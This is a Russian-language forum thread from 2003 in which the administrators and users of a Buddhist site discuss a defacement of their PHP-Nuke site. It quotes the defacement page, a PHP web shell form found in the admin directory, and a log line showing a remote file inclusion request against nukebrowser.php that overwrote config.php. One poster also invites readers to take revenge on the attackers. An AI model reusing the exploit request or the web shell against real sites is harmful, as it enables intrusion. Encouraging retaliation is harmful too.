28 января, с 2:49 до 5:30 GMT orientalia.org и iztok.net стали объектом хакерской атаки. Config файл был заменен на демоническую картинку и сообщение связаться с тем, кто это якобы сделал.
Возможно это уязвимости движка php-Nuke, но возможны и другие причины. Вопрос исследуется системными администраторами.
Кому интересно, что там было в сообщении и как выглядит дьявол, может скопировать сорс и записать как html
<table width="97%" border="0" align="center" cellpadding="2" cellspacing="0">
<tr>
<td><font class="content"><font class="content"><strong><big>·</big></strong><a href="HTTP/1.1 200 OKDate: Tue, 28 Jan 2003 02:49:46 GMTServer: ApacheX-Powered-By: PHP/4.2.3Connection: closeContent-Type: text/html<html> <head> <title># P()W # Pirates of NetWork ownz r b0x.. # P()W #</title> <style type="text/css"> a{text-decoration:none} a:hover{color=black} </style> </head> <body text="black" bgcolor="white" link="#808080" alink="#808080" vlink="#808080" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"> <font face="fixedsys"><center> <table width="90%" border="0"><tr><td> $ id;uname -a <br>uid=512(apache) gid=512(apache) groups=512(apache) <br>sh: /bin/uname: Permission denied <br>$ echo permission denied? u fuckin mother fucker... > /dev/null <br>$ cat HACKMSG </td></tr></table> <br><img width="225" height="305" src="http://www.xdeposit.hpg.com.br/demon.jpg"> <br> <br>We are: <u>Havenard</u> :: Tw1STer :: Spectroman :: w4r10ck <br>Contact: <a href="mailto:pnw@linuxmail.org">p<u>nw@linuxmail.or</u>g</a>, <a href="http://www.pnw-br.org"><u>www.</u>p<u>nw-br.or</u>g</a><br> <table width="90%" border="0"><tr><td> <br>$ echo good bye admin! new vulnerabilities rules.. > /dev/null <br>$ exit </td></tr></table> </body></html>" target="new"># P()W # Pirates of NetWork ownz r b0x.. # P()W #</a><br>
</font></td>
</tr>
</table>
Я успел видеть картинку.
Попахивает черной магией, которой не раз уже пугали последователи одного интересного культа, подвергавшегося мягкой критике :).
вот она картинка:
http://www.xdeposit.hpg.com.br/demon.jpg
Сисадмины на все 100% уверены, что хакери залезли через формы сообщений - либо на форуме, либо в комментариях под статьями, либо via личные сообщения, если это регистрированный юзер.
Я запретил анонимные комментарии к статьям, то же самое сделаю и с форумами. Кто хочет писать, пусть регистрируется и укажет домашнюю страницу. Нельзя больше рисковать. WebMail наверное тоже удалю, так что подношу свои извинения всем, кому был открыт счет uname@orientalia.org.
Еще стоит запретить html-код в любых сообщениях.
Еще стоит запретить html-код в любых сообщениях.
Еще стоит запретить html-код в любых сообщениях.
Еще стоит запретить html-код в любых сообщениях.
Еще стоит запретить html-код в любых сообщениях.
* * *
Интересно, почему эта сутра не выявляется. :?:
Непонятно, почему мое сообщение открывается, а ваше, Хуанди, не открывалось. Вы через реплику писали или reply использовали?
Всегда использую окошко внизу - так намного быстрее. Линки sutraxxxx у меня тоже не всегда работают.
Это сообщение я отредактировал, если что.
А это для теста - нерадактированое, может пригодится :)
Вчера поздним вечером был подменен и index.php, т.е. основной файл сайта.
И еще обнаружил странный .php файл в администраторской директории. Очевидно экзекутивный. Содержит вот такую вещь:
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top">
<form method="post" name="terminal" action="<? echo $PHP_SELF; ?>" target="_self">
Directory:<br>
<input type="text" name="changedir" size="50"<?if (isset($changedir)) echo " value=\"$changedir\""; ?>><br><br>
Command:<br>
<input type="text" name="command" size="50">
<input type="submit" value="Execute"><br>
<input type="checkbox" name="stderr"<? if (isset($stderr)) echo " checked"; ?>> Enable stderr-trappin
</form>
</td>
</tr>
</table>
мда.. кто-то упражняется в хакерстве %))
закройте доступ в библиотеку..
И продолжает упражняться. Час тому назад висела картинка (ее не было видно), но на португальском было написано: "Так бывает с теми, кто нас критикует!" - и адрес какого-то бразильского сайта!?
дети - не ведают, что творят..
Закрыл всем анонимным вход в разделы, где можно информацию подавать и записывать на сайте. Действительно неясно, кому мы так мешаем и чем.
Я думаю это очередная попытка дискредитировать ваджраяну со стороны хакеров-христиан :)Я думаю это очередная попытка дискредитировать ваджраяну со стороны хакеров-христиан :)
В чат под названием Dharma где мы с ГК и кажется Nick'ом (?) о чем-то болтали вошел парень венесуэлец. Он нашел чат через поиск, ища название своей любимой бразильской баскетбольной комманды DHARMA. Он решил, что в этом чате какие-то наглые турки (ie имеет обыкновение принимать кририлицу за турецкий язык) ругают его комманду. ГК все ему популярно объснил и даже подружился.
Подруга сказала, что по всему миру сейчас идут хакерские атаки. Какой-то вирус. Вроде российские провайдеры ставят какой-то заслон этому вирусу. Так она слышала.
Поинтересовалась, этот сервер в Болгарии расположен или где.
Я описала хакерскую картинку на сайте, которую видела. Она сказала, что "вот-вот именно эта картинка".
Так что м.б. это и не наши личные враги, а обчественные.
Воттт...
Хуанди, ваджраяну бы не трогал. Дружил бы хозяин сайта с ваджраяной ;) , проблем бы не было. А так блуждают все кому попало, от Пируна до Дурги.. вот и колбасит.
Бодхи - Протекторат ?! -))))))))
Никакой это не вирус, а лоха, т.е. дыра в модулях, точнее, в Переводчике сайтов.
Вот что этот парень из Бразилии делал ровно в 14:53 GMT, когда подменил конфиг
200.158.15.152 - - [30/Jan/2003:22:53:41 +0800] "GET /nukebrowser.php?filnavn=url&filhead=http://www.twinhead.com.br/havenard/filesend.txt&path=http://www.pnw-br.org/index.html&save=config.php HTTP/1.1" 200 5971 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
Тут и его два сайта. Кто хочет и может возмездие устроить, пожалуйста, ему все карты в руки. :-)
Никакой это не вирус, а лоха, т.е. дыра в модулях, точнее, в Переводчике сайтов.
Вот что этот парень из Бразилии делал ровно в 14:53 GMT, когда подменил конфиг
200.158.15.152 - - [30/Jan/2003:22:53:41 +0800] "GET /nukebrowser.php?filnavn=url&filhead= http://www.twinhead.com.br/havenard/filesend.txt &path=http://www.pnw-br.org/index.html &save=config.php HTTP/1.1" 200 5971 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
Тут и его два сайта. Кто хочет и может возмездие устроить, пожалуйста, ему все карты в руки. :-)
Если это на самом деле фанат-баскетболист, то это будет один из лучших анекдотов в интернете :). Народ вповалку будет лежать от смеха.
Я запретил доступ всем, чьи IP адреса начинаются на 80 или 200. Придется отказаться от аромата бразильского кофе. Сегодня ночью не было атак.
На 80 IP начинаются у Huandi и Adepta :)
Так это не были бразильцы, что Вы говорите?!
Я хочу сказать, что они теперь писать не смогут ...
мда.. пошутили - спасибо ))
Это что! Я сегодня забанил еще одного нахала, который залез в файл, куда ему не надо было залезать.
А потом оказалось, что это IP нашего старого Симпозиума, который черпает информацию о последних форумных сообщениях. До того дошел, что сам хакнул свой сайт. Возился два часа со старым Симпозиум, пока понял, что я сам являюсь причиной его хакнутости.
мдаа.....-))
ломали ломают и будут ломать
:o